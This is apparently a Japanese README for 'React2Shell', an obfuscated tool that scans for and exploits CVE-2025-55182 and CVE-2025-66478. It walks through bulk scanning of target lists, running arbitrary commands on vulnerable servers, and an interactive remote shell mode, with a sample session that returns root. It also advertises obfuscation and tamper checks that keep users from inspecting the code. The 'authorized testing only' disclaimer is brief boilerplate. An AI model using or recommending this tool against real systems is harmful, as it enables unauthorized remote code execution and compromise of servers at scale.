
React2Shell - CVE-2025-55182 & CVE-2025-66478
著者: LAKSHMIKANTHAN K(letchupkt)
Instagram: @letchu_pkt
バージョン: 2.0.0(難読化)
日付: 2025-12-07
python react2shell.py
これだけです!スキャナーは次の処理を行います:
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Scan multiple URLs
python react2shell.py -f targets.txt
# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"
# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json
スキャナーを実行するたびに、自動的に以下を行います:
誰かが難読化されたコードを改変しようとした場合:
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
スキャナーは改変を検出した場合、実行を拒否します。
すべての元の機能は100%維持されています:
python react2shell.py -u https://example.com
出力:
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
Version: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Select option 5
# Enter target URL
シェルセッション:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
このツールは認可されたセキュリティテスト専用です!
✅ 自身のアプリケーション
✅ 認可されたペネトレーションテスト
✅ バグバウンティプログラム(スコープ内)
✅ 認可されたセキュリティ研究
❌ 無許可のスキャン
❌ 無許可のエクスプロイト
❌ 違法行為全般
❌ 利用規約の違反
著者(LAKSHMIKANTHAN K)はこのツールの誤用について責任を負いません。ユーザーは自身の行動に対して単独で責任を負い、適用されるすべての法律を遵守する必要があります。
原因: ファイルが破損している
解決策: 新しいコピーをダウンロードする
原因: ファイルが改変されている
解決策: 新しいコピーをダウンロードする(ファイルを変更しないでください)
原因: 依存関係が不足している
解決策:
pip install requests urllib3
原因: 解凍のオーバーヘッド(わずか)
注意: 起動時に一度だけ発生し、その後はフルスピードで動作します
A: コードは難読化され圧縮されています。コードを読む必要がある場合は、難読化されていない元のバージョンを使用できます。
A: 影響は最小限です。起動時に解凍のためのわずかな遅延(約0.1秒)があり、その後はフルスピードで動作します。
A: いいえ。変更すると整合性チェックが失敗し、スキャナーは実行を拒否します。
A: 難読化は暗号化ではありません。執拗な攻撃者であればリバースエンジニアリングは可能ですが、非常に困難で時間がかかります。
A: Instagramで著者に連絡してください:@letchu_pkt
名前: LAKSHMIKANTHAN K(letchupkt)
Instagram: @letchu_pkt
問題が発生した場合:
pip install requests urllib3
python react2shell.py
対話型メニューから選択するか、CLIモードを使用します。
プロンプトに従うか、コマンドライン引数を指定します。
# Interactive mode
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Bulk scan
python react2shell.py -f targets.txt -t 20
# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"
# Help
python react2shell.py --help
LAKSHMIKANTHAN K(letchupkt)
Instagram: @letchu_pkt
CVEスキャナーをご利用いただきありがとうございます!🚀
バージョン: 2.0.0(難読化)
日付: 2025-12-07
ライセンス: 認可されたセキュリティテスト専用